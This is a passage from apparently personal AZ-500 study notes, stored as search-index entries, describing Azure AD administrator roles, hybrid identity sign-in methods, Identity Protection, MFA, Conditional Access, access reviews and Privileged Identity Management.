(FIDO) device keys -Update password expiration policies -Create and manage support tickets in Azure and the Microsoft 365 admin center -Monitor service healthUsers with this role\u00a0can't\u00a0do the following tasks: -Can't manage MFA. -Can't change the credentials or reset MFA for members and owners of a role-assignable group. -Can't manage shared mailboxes User Administrator Users with this role can\u00a0change passwords\u00a0for people who may have access to sensitive or private information or critical configuration inside and outside of Azure Active Directory. Changing the password of a user may mean the ability to assume that user's identity and permissions. For example: -Application Registration and Enterprise Application owners, who can manage credentials of apps they own. Those apps may have privileged permissions in Azure AD and elsewhere not granted to User Administrators. Through this path, a User Administrator may be able to assume the identity of an application owner and then further assume the identity of a privileged application by updating the credentials for the application. -Azure subscription owners, who may have access to sensitive or private information or critical configuration in Azure. -Security Group and Microsoft 365 group owners, who can manage group membership. Those groups may grant access to sensitive or private information or critical configuration in Azure AD and elsewhere. -Administrators in other services outside of Azure AD like Exchange Online, Office Security and compliance center, and human resources systems. -Nonadministrators\u00a0like executives, legal counsel, and human resources employees who may have access to sensitive or private information. Virtual Visits Administrator Users with this role can do the following tasks: -Manage and configure all aspects of Virtual Visits in Bookings in the Microsoft 365 admin center, and in the Teams Electronic Health Record (EHR) connector -View usage reports for Virtual Visits in the Teams admin center, Microsoft 365 admin center, and Power BI -View features and settings in the Microsoft 365 admin center, but can't edit any settings Windows 365 Administrator Users with this role have global permissions on Windows 365 resources, when the service is present. Additionally, this role contains the ability to manage users and devices in order to associate policy and create and manage groups. This role can create and manage security groups, but doesn't have administrator rights over Microsoft 365 groups. That means administrators can't update owners or memberships of Microsoft 365 groups in the organization. However, they can manage the Microsoft 365 group they create, which is a part of their end-user privileges. So, any Microsoft 365 group (not security group) they create is counted against their quota of 250. Assign the Windows 365 Administrator role to users who need to do the following tasks: -Manage Windows 365 Cloud PCs in Microsoft Endpoint Manager -Enroll and manage devices in Azure AD, including assigning users and policies -Create and manage security groups, but not role-assignable groups -View basic properties in the Microsoft 365 admin center -Read usage reports in the Microsoft 365 admin center -Create and manage support tickets in Azure and the Microsoft 365 admin center Windows Update Deployment Administrator Users in this role can create and manage all aspects of Windows Update deployments through the Windows Update for Business deployment service. The deployment service enables users to define settings for when and how updates are deployed, and specify which updates are offered to groups of devices in their tenant. It also allows users to monitor the update progress. Yammer Administrator Assign the Yammer Administrator role to users who need to do the following tasks: -Manage\u00a0all aspects of Yammer -Create,\u00a0manage, and\u00a0restore\u00a0Microsoft 365 Groups, but not role-assignable groups -View the hidden members of Security groups and Microsoft 365 groups, including role assignable groups -Read usage reports\u00a0in the Microsoft 365 admin center -Create\u00a0and\u00a0manage\u00a0service requests in the Microsoft 365 admin center -View announcements\u00a0in the Message center, but not security announcements -View\u00a0service health","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#15-deploy-azure-active-directory-domain-services","title":"1.5. Deploy Azure Active Directory Domain Services","text":"

        Azure Active Directory Domain Services (Azure AD DS) provides managed domain services such as domain join, group policy, lightweight directory access protocol (LDAP), and Kerberos/New Technology LAN Manager (NTLM) authentication. You use these domain services without the need to deploy, manage, and patch domain controllers (DCs) in the cloud.

        Azure AD DS integrates with your existing Azure AD tenant. This integration lets users sign in to services and applications connected to the managed domain using their existing credentials.

        When you create an Azure AD DS managed domain, you define a unique namespace. This namespace is the domain name, such as\u00a0aaddscontoso.com. Two Windows Server domain controllers (DCs) are then deployed into your selected Azure region. This deployment of DCs is known as a replica set. You can expand a managed domain to have more than one replica set per Azure AD tenant. Replica sets can be added to any peered virtual network in any Azure region that supports Azure AD DS. You don't need to manage, configure, or update these DCs. The Azure platform handles the DCs as part of the managed domain, including backups and encryption at rest using Azure Disk Encryption.

        Azure AD DS replicates identity information from Azure AD, so it works with Azure AD tenants that are cloud-only or synchronized with an on-premises AD DS environment. Azure AD DS performs a one-way synchronization from Azure AD to provide access to a central set of users, groups, and credentials. You can create resources directly in the managed domain (Azure ADDS), but they aren't synchronized back to Azure AD.

        Concepts:

        Azure Active Directory (Azure AD) - Cloud-based\u00a0identity and mobile device management that provides user account and authentication services for resources such as Microsoft 365, the Azure portal, or SaaS applications.

        Azure AD can be synchronized with an on-premises AD DS environment to provide a single identity to users that works natively in the cloud.

        Active Directory Domain Services (AD DS)\u00a0-\u00a0Enterprise-ready lightweight directory access protocol (LDAP) server\u00a0that provides key features such as identity and authentication, computer object management, group policy, and trusts.

        AD DS is a central component in many organizations with an on-premises IT environment and provides core user account authentication and computer management features.

        Azure Active Directory Domain Services (Azure AD DS)\u00a0-\u00a0Provides managed domain services\u00a0with a subset of fully compatible traditional AD DS features such as domain join, group policy, LDAP, and Kerberos / New Technology LAN Manager (NTLM) authentication.

        Azure AD DS integrates with Azure AD, which can synchronize with an on-premises AD DS environment. This ability extends central identity use cases to traditional web applications that run in Azure as part of a lift-and-shift strategy.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#16-create-and-manage-azure-ad-users","title":"1.6. Create and manage Azure AD users","text":"

        Note for deleted users:

        The user is deleted and no longer appears on the\u00a0Users\u00a0-\u00a0All users\u00a0page. The user can be seen on the\u00a0Deleted users\u00a0page for the next\u00a030 days\u00a0and can be restored during that time. When a user is deleted, any licenses consumed by the user are made available for other users.

        To update the identity, contact information, or job information for users whose source of authority is Windows Server Active Directory, you must use Windows Server Active Directory. After you complete the update, you must wait for the next synchronization cycle to complete before you see the changes.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#17-manage-users-with-azure-ad-groups","title":"1.7. Manage users with Azure AD groups","text":"

        Azure AD lets you use groups to manage access to applications, data, and resources. Resources can be:

        • Part of the Azure AD organization, such as permissions to manage objects through roles in Azure AD
        • External to the organization, such as for Software as a Service (SaaS) apps
        • Azure services
        • SharePoint sites
        • On-premises resources

        There are\u00a0two group types\u00a0and\u00a0three group membership types.

        Group types: - Security: Used to manage user and computer access to shared resources. - Microsoft 365: Provides collaboration opportunities by giving group members access to a shared mailbox, calendar, files, SharePoint sites, and more.

        Membership types:

        • Assigned: Lets you add specific users as members of a group and have unique permissions.
        • Dynamic user: Lets you use dynamic membership rules to automatically add and remove members. If a member's attributes change, the system looks at your dynamic group rules for the directory to see if the member meets the rule requirements (is added), or no longer meets the rules requirements (is removed).
        • Dynamic device: Lets you use dynamic group rules to automatically add and remove devices. If a device's attributes change, the system looks at your dynamic group rules for the directory to see if the device meets the rule requirements (is added), or no longer meets the rules requirements (is removed).

        You can create a dynamic group for either devices or users but not for both. You can't create a device group based on the device owners' attributes. Device membership rules can only reference device attributions.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#18-configure-azure-ad-administrative-units","title":"1.8. Configure Azure AD administrative units","text":"

        An administrative unit can contain only users and groups. Administrative units restrict permissions in a role to any portion of your organization that you define. You could, for example, use administrative units to delegate the Helpdesk Administrator role to regional support specialists.

        To use administrative units, you need an Azure Active Directory Premium license for each administrative unit admin, and Azure Active Directory Free licenses for administrative unit members.

        Available roles for Azure AD administrative units

        Role Description Authentication Administrator Has access to view, set, and reset authentication method information for any non-admin user in the assigned administrative unit only. Groups Administrator Can manage all aspects of groups and groups settings, such as naming and expiration policies, in the assigned administrative unit only. Helpdesk Administrator Can reset passwords for non-administrators and Helpdesk administrators in the assigned administrative unit only. License Administrator Can assign, remove, and update license assignments within the administrative unit only. Password Administrator Can reset passwords for non-administrators and Password Administrators within the assigned administrative unit only. User Administrator Can manage all aspects of users and groups, including resetting passwords for limited admins within the assigned administrative unit only.","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#19-passwordless-authentication","title":"1.9. Passwordless authentication","text":"

        Microsoft global Azure and Azure Government offer the following\u00a0three\u00a0passwordless authentication options that integrate with Azure Active Directory (Azure AD):

        1. Windows Hello for Business: Windows Hello for Business is ideal for information workers that have their own designated Windows PC. The biometric and PIN credentials are directly tied to the user's PC, which prevents access from anyone other than the owner. With public key infrastructure (PKI) integration and built-in support for single sign-on (SSO), Windows Hello for Business provides a convenient method for seamlessly accessing corporate resources on-premises and in the cloud.
        2. Microsoft Authenticator: You can also allow your employee's phone to become a passwordless authentication method. You may already be using the Authenticator app as a convenient multi-factor authentication option in addition to a password. You can also use the Authenticator App as a passwordless option.
        3. Fast Identity Online2 (FIDO2) security keys: The FIDO (Fast IDentity Online) Alliance helps to promote open authentication standards and reduce the use of passwords as a form of authentication. FIDO2 is the latest standard that incorporates the web authentication (WebAuthn) standard. Users can register and then select a FIDO2 security key at the sign-in interface as their main means of authentication. These FIDO2 security keys are typically USB devices but could also use Bluetooth or Near-Field Communication (NFC).
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#2-implement-hybrid-identity","title":"2. Implement Hybrid Identity","text":"

        Hybrid Identity is the process of connecting your on-premises Active Directory with your Azure Active Directory.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#21-deploy-azure-ad-connect","title":"2.1. Deploy Azure AD connect","text":"

        Azure AD Connect will integrate your on-premises directories with Azure Active Directory.

        Azure AD Connect provides the following features:

        • Password hash synchronization. A sign-in method that synchronizes a hash of a users on-premises AD password with Azure AD.
        • Pass-through authentication. A sign-in method that allows users to use the same password on-premises and in the cloud, but doesn't require the additional infrastructure of a federated environment.
        • Federation integration. Federation is an optional part of Azure AD Connect and can be used to configure a hybrid environment using an on-premises AD FS infrastructure. It also provides AD FS management capabilities such as certificate renewal and additional AD FS server deployments.
        • Synchronization. Responsible for creating users, groups, and other objects. As well as, making sure identity information for your on-premises users and groups is matching the cloud. This synchronization also includes password hashes.
        • Health Monitoring. Azure AD Connect Health can provide robust monitoring and provide a central location in the Azure portal to view this activity.

        Azure Active Directory (Azure AD) Connect Health\u00a0provides robust monitoring of your on-premises identity infrastructure. It enables you to maintain a reliable connection to Microsoft 365 and Microsoft Online Services. With Azure AD Connect the key data you need is easily accessible. You can view and act on alerts, setup email notifications for critical alerts, and view performance data. Using AD Connect Health works by installing an agent on each of your on-premises sync servers.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#23-introduction-to-authentication","title":"2.3 Introduction to Authentication","text":"

        Identity is the new control plane of IT security. When the Azure AD hybrid identity solution is your new control plane, authentication is the foundation of cloud access. All the other advanced security and user experience features in Azure AD depends on your authentication method.

        Azure AD supports the following authentication methods for hybrid identity solutions:

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#cloud-authentication","title":"Cloud authentication","text":"

        Azure AD handles users' sign-in process. \u00a0Coupled with seamless single sign-on (SSO), users can sign in to cloud apps without having to reenter their credentials.

        Option 1: Azure AD password hash synchronization.\u00a0The simplest way to enable authentication for on-premises directory objects in Azure AD.

        Option 2: Azure AD Pass-through Authentication.\u00a0Provides a simple password validation for Azure AD authentication services by using a software agent that runs on one or more on-premises servers. The servers validate the users directly with your on-premises Active Directory, which ensures that the password validation doesn't happen in the cloud. Companies with a security requirement to immediately enforce on-premises user account states, password policies, and sign-in hours might use this authentication method.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#federal-authentication","title":"Federal authentication","text":"

        Azure AD hands off the authentication process to a separate trusted authentication system, such as on-premises Active Directory Federation Services (AD FS), to validate the user\u2019s password. The authentication system can provide additional advanced authentication requirements. Examples are smartcard-based authentication or third-party multifactor authentication.

        So, which one is more appropiate for your organization? See this decision tree:

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#24-azure-ad-password-hash-synchronization-phs","title":"2.4. Azure AD Password Hash Synchronization (PHS)","text":"

        Password hash synchronization\u00a0(PHS) is a feature used to synchronize user passwords from an on-premises Active Directory instance to a cloud-based Azure AD instance. Use this feature to sign in to Azure AD services like Microsoft 365, Microsoft Intune, CRM Online, and Azure Active Directory Domain Services (Azure AD DS). You sign in to the service by using the same password you use to sign in to your on-premises Active Directory instance.

        How does syncronization work? In the background, the password synchronization component takes the user\u2019s password hash from on-premises Active Directory, encrypts it, and passes it as a string to Azure. Azure decrypts the encrypted hash and stores the password hash as a user attribute in Azure AD. When the user signs in to an Azure service, the sign-in challenge dialog box generates a hash of the user\u2019s password and passes that hash back to Azure. Azure then compares the hash with the one in that user\u2019s account. If the two hashes match, then the two passwords must also match and the user receives access to the resource. The dialog box provides the facility to save the credentials so that the next time the user accesses the Azure resource, the user will not be prompted.

        It is important to understand that this is\u00a0same sign-in, not single sign-on. The user still authenticates against two separate directory services, albeit with the same user name and password. This solution provides a simple alternative to an AD FS implementation.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#25-azure-ad-pass-through-authentication-pta","title":"2.5. Azure AD Pass-through Authentication (PTA)","text":"

        Azure AD Pass-through Authentication\u00a0(PTA) allows users to sign in to both on-premises and cloud-based applications using the same user account and passwords. When users sign-in using Azure AD, Pass-through authentication validates the users\u2019 passwords directly against an organization's on-premise Active Directory. Benefits:

        • Supports user sign-in into all web browser-based applications and into Microsoft Office client applications that use modern authentication.
        • Sign-in usernames can be either the on-premises default username (userPrincipalName) or another attribute configured in Azure AD Connect (known as Alternate ID).
        • Works seamlessly with conditional access features such as Azure Active Directory Multi-Factor Authentication to help secure your users.
        • Integrated with cloud-based self-service password management, including password writeback to on-premises Active Directory and password protection by banning commonly used passwords.
        • Multi-forest environments are supported if there are forest trusts between your AD forests and if name suffix routing is correctly configured.
        • PTA is a free feature, and you don't need any paid editions of Azure AD to use it.
        • PTA can be enabled via Azure AD Connect.
        • PTA uses a lightweight on-premises agent that listens for and responds to password validation requests.
        • Installing multiple agents provides high availability of sign-in requests.
        • PTA protects your on-premises accounts against brute force password attacks in the cloud.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#26-azure-ad-federation","title":"2.6. Azure AD Federation","text":"

        Federation is a collection of domains that have established trust. The level of trust may vary, but typically includes authentication and almost always includes authorization. A typical federation might include a number of organizations that have established trust for shared access to a set of resources. You can federate your on-premises environment with Azure AD and use this federation for authentication and authorization. This sign-in method ensures that all user authentication occurs on-premises. This method allows administrators to implement more rigorous levels of access control.

        If you decide to use Federation with Active Directory Federation Services (AD FS), you can optionally set up password hash synchronization as a backup in case your AD FS infrastructure fails.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#27-configure-password-writeback","title":"2.7. Configure password writeback","text":"

        Password writeback\u00a0is a feature enabled with Azure AD Connect that allows password changes in the cloud to be written back to an existing on-premises directory in real time.

        To use\u00a0self-service password reset (SSPR)\u00a0you must have already configured Azure AD Connect in your environment.

        Password writeback provides:

        • Enforcement of on-premises Active Directory Domain Services password policies. When a user resets their password, it is checked to ensure it meets your on-premises Active Directory Domain Services policy before committing it to that directory. This review includes checking the history, complexity, age, password filters, and any other password restrictions that you have defined in local Active Directory Domain Services.
        • Zero-delay feedback. Password writeback is a synchronous operation. Your users are notified immediately if their password did not meet the policy or could not be reset or changed for any reason.
        • Supports password changes from the access panel and Microsoft 365. When federated or password hash synchronized users come to change their expired or non-expired passwords, those passwords are written back to your local Active Directory Domain Services environment.
        • Supports password writeback when an admin resets them from the Azure portal. Whenever an admin resets a user\u2019s password in the Azure portal, if that user is federated or password hash synchronized, the password is written back to on-premises. This functionality is currently not supported in the Office admin portal.
        • Doesn\u2019t require any inbound firewall rules. Password writeback uses an Azure Service Bus relay as an underlying communication channel. All communication is outbound over port 443.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#3-microsoft-entra-id-protection-identity-protection","title":"3. Microsoft Entra ID Protection (Identity Protection)","text":"

        Risk detections in Azure AD Identity Protection include any identified suspicious actions related to user accounts in the directory. The signals generated that are fed to Identity Protection, can be further fed into tools like Conditional Access to make access decisions, or fed back to a security information and event management (SIEM) tool for further investigation based on your organization's enforced policies.

        For your organization to be protected you can have:

        • Azure AD Identity Protection policies can automatically block a sign-in attempt or require additional action, such as requiring a password change or prompt for Azure AD Multi-Factor Authentication.
        • These policies work with existing Azure AD Conditional Access policies as an extra layer of protection for your organization.

        Some of the following actions may trigger Azure AD Identity Protection risk detection:

        • Users with leaked credentials.
        • Sign-ins from anonymous IP addresses.
        • Impossible travel to atypical locations.
        • Sign-ins from infected devices.
        • Sign-ins from IP addresses with suspicious activity.

        Azure Active Directory Identity Protection includes three default policies that administrators can choose to enable:

        The insight you get for a detected risk detection is tied to your Azure AD subscription.

        • MFA registration policy\u00a0- Identity Protection can help organizations roll out Azure Multi-Factor Authentication using a Conditional Access policy requiring registration at sign-in. Makes sure users are registered for Azure AD Multi-Factor Authentication. If a sign-in risk policy prompts for MFA, the user must already be registered for Azure AD Multi-Factor Authentication.
        • Sign-in risk policy\u00a0- Identity Protection analyzes signals from each sign-in, both real-time and offline, and calculates a risk score based on the probability that the sign-in wasn't performed by the user. Administrators can decide based on this risk score signal to enforce organizational requirements. Administrators can choose to block access, allow access, or allow access but require multi-factor authentication. Administrators can also choose to create a custom Conditional Access policy, including sign-in risk as an assignment condition.
        • User risk policy\u00a0- Identifies and responds to user accounts that may have compromised credentials. Can prompt the user to create a new password.

        When you enable a policy user or sign-in risk policy, you can also choose the threshold for risk level -\u00a0low and above,\u00a0medium and above, or\u00a0high. This flexibility lets you decide how aggressive you want to be in enforcing any controls for suspicious sign-in events.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#31-implement-user-risk-policy","title":"3.1. Implement user risk policy","text":"

        Identity Protection can calculate what it believes is normal for a user's behavior and use that to base decisions for their risk. User risk is a calculation of probability that an identity has been compromised. Administrators can decide based on this risk score signal to enforce organizational requirements. Administrators can choose to block access, allow access, or allow access but require a password change using Azure AD self-service password reset.

        The risky users report includes these data:

        • Which users are at risk, have had risk remediated, or have had risk dismissed?
        • Details about detections
        • History of all risky sign-ins
        • Risk history

        Administrators can then choose to act on these events. Administrators can choose to:

        • Reset the user password
        • Confirm user compromise
        • Dismiss user risk
        • Block user from signing in
        • Investigate further using Azure ATP
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#32-implement-sign-in-risk-policy","title":"3.2. Implement sign-in risk policy","text":"

        Sign-in risk represents the probability that a given authentication request isn't authorized by the identity owner. For users of Azure Identity Protection, sign-in risk can be evaluated as part of a Conditional Access policy. Sign-in Risk Policy supports the following conditions:

        • Location: When configuring location as a condition, organizations can choose to include or exclude locations. \u00a0These named locations may include the public IPv4 network information, country or region, or even unknown areas that don't map to specific countries or regions.
        • Client apps: Conditional Access policies by default apply to browser-based applications and applications that utilize modern authentication protocols. In addition to these applications, administrators can choose to include Exchange ActiveSync clients and other clients that utilize legacy protocols.
        • Risky sign-ins: The risky sign-ins report contains filterable data for up to the past 30 days (1 month). With the information provided by the risky sign-ins report, administrators can find:
          • Which sign-ins are classified as at risk, confirmed compromised, confirmed safe, dismissed, or remediated.
          • Real-time and aggregate risk levels associated with sign-in attempts.
          • Detection types triggered.
          • Conditional Access policies applied
          • MFA details
          • Device information
          • Application information
          • Location information

        Administrators can then choose to take action on these events. Administrators can choose to:

        • Confirm sign-in compromise
        • Confirm sign-in safe
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#33-deploy-multifactor-authentication-in-azure","title":"3.3. Deploy multifactor authentication in Azure","text":"

        For organizations that need to be compliant with industry standards, such as the Payment Card Industry (PCI) Data Security Standard (DSS) version 3.2, MFA is a must have capability to authenticate users. Beyond being compliant with industry standards, enforcing MFA to authenticate users can also help organizations to mitigate credential theft attacks.

        Methods

        Call to phone: Places an automated voice call. The user answers the call and presses # in the phone keypad to authenticate. The phone number is not synchronized to on-premises Active Directory. A voice call to phone is important because it persists through a phone handset upgrade, allowing the user to register the mobile app on the new device.

        Text message to phone: Sends a text message that contains a verification code. The user is prompted to enter the verification code into the sign-in interface. This process is called one-way SMS. Two-way SMS means that the user must text back a particular code. Two-way SMS is deprecated and not supported after November 14, 2018. Users who are configured for two-way SMS are automatically switched to call to phone verification at that time.

        Notification through mobile app: Sends a push notification to your phone or registered device. The user views the notification and selects Approve to complete verification. The Microsoft Authenticator app is available for Windows Phone, Android, and iOS. Push notifications through the mobile app provide the best user experience.

        Verification code from mobile app: The Microsoft Authenticator app generates a new OATH verification code every 30 seconds. The user enters the verification code into the sign-in interface. The Microsoft Authenticator app is available for Windows Phone, Android, and iOS. Verification code from mobile app can be used when the phone has no data connection or cellular signal.

        Settings

        • Account lockout: The account lockout settings let you specify how many failed attempts to allow before the account becomes locked out for a period of time. \u00a0The account lockout settings are only applied when a pin code is entered for the MFA prompt. The following settings are available: Number of MFA denials to trigger account lockout, Minutes until account lockout counter is reset, Minutes until account is automatically unblocked.
        • Block and unblock users: If a user's device has been lost or stolen, you can block authentication attempts for the associated account.
        • Fraud alerts: Configure the fraud alert feature so that your users can report fraudulent attempts to access their resources. Code to report fraud during initial greeting: When users receive a phone call to perform two-step verification, they normally press # to confirm their sign-in. To report fraud, the user enters a code before pressing #. This code is 0 by default, but you can customize it.
        • Notification: Email notifications can be configured when users report fraud alerts.
        • OATH tokens: Azure AD supports the use of OATH-TOTP SHA-1 tokens that refresh codes every 30 or 60 seconds. Customers can purchase these tokens from the vendor of their choice.
        • Trusted IPs: Trusted IPs is a feature to allow federated users or IP address ranges to bypass two-step authentication. Notice there are two selections in this screenshot.
          • Managed tenants. For managed tenants, you can specify IP ranges that can skip MFA.
          • Federated tenants. For federated tenants, you can specify IP ranges and you can also exempt AD FS claims users.

        How to deploy MFA

        To enable MFA, go to the User Properties in Azure Active Directory, and then the Multi-Factor Authentication option. From there, you can select the users that you want to modify and enable for MFA. You can also bulk enable groups of users with PowerShell. User's states can be\u00a0Enabled,\u00a0Enforced, or\u00a0Disabled.

        Azure AD Multi-Factor Authentication is included free of charge for global administrator security. Enabling MFA for global administrators provides an added level of security when managing and creating Azure resources like virtual machines, managing storage, or using other Azure services. Secondary authentication includes phone call, text message, and the authenticator app. Remember, you can only enable MFA for organizational accounts stored in Azure Active Directory. These are also called work or school accounts.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#34-azure-ad-conditional-access","title":"3.4. Azure AD Conditional Access","text":"

        Conditional Access is the tool used by Azure Active Directory to bring signals together, to make decisions, and enforce organizational policies. Conditional Access policies at their simplest are if-then statements, if a user wants to access a resource, then they must complete an action. Conditional Access policies are enforced after the first-factor authentication has been completed. Conditional Access is not intended as an organization's first line of defense for scenarios like denial-of-service (DoS) attacks but can use signals from these events to determine access.

        Conditional Access is at the heart of the new\u00a0identity driven control plane. Identity as a Service\u2014the new control plane

        Conditional access comes with six conditions: user/group, cloud application, device state, location (IP range), client application, and sign-in risk.

        With access controls, you can either Block Access altogether or Grant Access with more requirements:

        • Require MFA from Azure AD or an on-premises MFA (combined with AD FS).
        • Grant access to only trusted devices.
        • Require a domain-joined device.
        • Require mobile devices to use Intune app protection policies.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#35-azure-active-directory-azure-ad-access-reviews","title":"3.5. Azure Active Directory (Azure AD) access reviews","text":"

        Navigate to\u00a0Azure Active Directory (or Microsoft Entra ID) > Identity Governance. Select Access reviews.

        Azure Active Directory (Azure AD) access reviews enable organizations to efficiently manage group memberships, access to enterprise applications, and role assignments.

        Use access reviews in the following cases:

        • Too many users in privileged roles: It's a good idea to check how many users have administrative access, how many of them are Global Administrators, and if there are any invited guests or partners that have not been removed after being assigned to do an administrative task. You can recertify the role assignment users in Azure AD roles such as Global Administrators, or Azure resources roles such as User Access Administrator in the Azure AD Privileged Identity Management (PIM) experience.
        • When automation is infeasible: You can create rules for dynamic membership on security groups or Microsoft 365 Groups, but what if the HR data is not in Azure AD or if users still need access after leaving the group to train their replacement? You can then create a review on that group to ensure those who still need access should have continued access.
        • When a group is used for a new purpose: If you have a group that is going to be synced to Azure AD, or if you plan to enable a sales management application for everyone in the Sales team group, it would be useful to ask the group owner to review the group membership prior to the group being used in a different risk content.
        • Business critical data access: for certain resources, it might be required to ask people outside of IT to regularly sign out and give a justification on why they need access for auditing purposes.
        • To maintain a policy's exception list: In an ideal world, all users would follow the access policies to secure access to your organization's resources. However, sometimes there are business cases that require you to make exceptions. As the IT admin, you can manage this task, avoid oversight of policy exceptions, and provide auditors with proof that these exceptions are reviewed regularly.
        • Ask group owners to confirm they still need guests in their groups: Employee access might be automated with some on premises IAM, but not invited guests. If a group gives guests access to business sensitive content, then it's the group owner's responsibility to confirm the guests still have a legitimate business need for access.
        • Have reviews recur periodically: You can set up recurring access reviews of users at set frequencies such as weekly, monthly, quarterly or annually, and the reviewers will be notified at the start of each review. Reviewers can approve or deny access with a friendly interface and with the help of smart recommendations.
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#4-microsoft-entra-privileged-identity-management-pim","title":"4. Microsoft Entra Privileged Identity Management (PIM)","text":"

        Using this feature requires Azure AD Premium P2 licenses. Azure AD Privileged Identity Management (PIM) allows you to manage, control, and monitor access to the most important resources in your organization. You can give just-in-time access and just-enough-access to users to allow them to do their tasks. Privileged Identity Management provides time-based and approval-based role activation to mitigate the risks of excessive, unnecessary, or misused access permissions on resources you care about. Here are some of the key features of Privileged Identity Management:

        • Provide just-in-time privileged access to Azure AD and Azure resources
        • Assign time-bound access to resources using start and end dates
        • Require approval to activate privileged roles
        • Enforce multi-factor authentication to activate any role
        • Use justification to understand why users activate
        • Get notifications when privileged roles are activated
        • Conduct access reviews to ensure users still need roles
        • Download audit history for internal or external audit
        • Prevents removal of the last active Global Administrator and Privileged Role Administrator role assignments

        Zero Trust model principles:

        • Verify explicitly\u00a0- Always authenticate and authorize based on all available data points.
        • Use least privilege access\u00a0- Limit user access with Just-In-Time and Just-Enough-Access (JIT/JEA), risk-based adaptive policies, and data protection.
        • Assume breach\u00a0- Minimize blast radius and segment access. Verify end-to-end encryption and use analytics to get visibility, drive threat detection, and improve defenses.

        Zero Trust model Architecture:

        The primary components of this process are Intune for device management and device security policy configuration, Azure AD conditional access for device health validation, and Azure AD for user and device inventory. The system works with Intune, pushing device configuration requirements to the managed devices. The device then generates a statement of health, which is stored in Azure AD. When the device user requests access to a resource, the device health state is verified as part of the authentication exchange with Azure AD.

        How does Privileged Identity Management work?

        Once you set up Privileged Identity Management, you'll see Tasks, Manage, and Activity options in the left navigation menu. As an administrator, you'll choose between options such as managing Azure AD roles, managing Azure resource roles, or PIM for Groups. When you choose what you want to manage, you see the appropriate set of options for that option.

        Azure AD roles:

        • Can manage Azure AD: Privileged Role Administrator, and Global Administrator roles.
        • Can read Azure AD roles: Global Administrators, Security Administrators, Global Readers, and Security Readers roles

        Azure AD resources: - can be managed by: Subscription Administrator, Resource Owner, and Resource User Access Administrator roles. - can not even be read by: Privileged Role Administrators, Security Administrators, or Security Readers roles

        Make sure there are always at least two users in a Privileged Role Administrator role, in case one user is locked out or their account is deleted.

        When creating an assignment, something that I didn't know in the setting up: - Type of the assignment - Eligible assignments require the member of the role to perform an action to use the role. Actions might include activation or requesting approval from designated approvers. - Active assignments don't require the member to perform any action to use the role. Members assigned as active have the privileges assigned to the role.

        How activates a role? If users have been made eligible for a role, then they must activate the role assignment before using the role. To activate the role, users select a specific activation duration within the maximum (configured by administrators) and the reason for the activation request. If the role requires approval to activate, a notification will appear in the upper right corner of the user's browser, informing them the request is pending approval. If approval isn't required, the member can start using the role. Delegated approvers receive email notifications when a role request is pending their approval. Approvers can view, approve or deny these pending requests in PIM. After the request has been approved, the member can start using the role. For example, if a user or a group was assigned with Contribution role to a resource group, they'll be able to manage that particular resource group.

        To extend or renew assignments, it's required approval from a Global Administrator or Privileged Role Administrator. Notifications can be sent to Admins, Requestors, and Approvers.

        Privileged Role Administrator permissions

        • Enable approval for specific roles
        • Specify approver users or groups to approve requests
        • View request and approval history for all privileged roles

        Approver permissions

        • View pending approvals (requests)
        • Approve or reject requests for role elevation (single and bulk)
        • Provide justification for my approval or rejection

        Eligible role user permissions

        • Request activation of a role that requires approval
        • View the status of your request to activate
        • Complete your task in Azure AD if activation was approved

        Assignment settings:

        • Allow permanent eligible assignment. Global admins and Privileged role admins can assign permanent eligible assignment. They can also require that all eligible assignments have a specified start and end date.
        • Allow permanent active assignment. Global admins and Privileged role admins can assign active eligible assignment. They can also require that all active assignments have a specified start and end date.

        Implement a privileged identity management workflow

        By configuring Azure AD PIM to manage our elevated access roles in Azure AD, we now have JIT access for more than 28 configurable privileged roles. We can also monitor access, audit account elevations, and receive additional alerts through a management dashboard in the Azure portal.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#5-design-an-enterprise-governance-strategy-azure-resource-manager","title":"5. Design an Enterprise Governance strategy: Azure Resource Manager","text":"

        Regardless of the deployment type,\u00a0you always retain responsibility for the following:

        • Data
        • Endpoints
        • Accounts
        • Access management

        Azure Resource Manager\u00a0is the deployment and management service for Azure. It provides a consistent management layer that allows you to create, update, and delete resources in your Azure subscription. You can use its access control, auditing, and tagging features to help secure and organize your resources after deployment.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#51-resource-groups","title":"5.1. Resource Groups","text":"

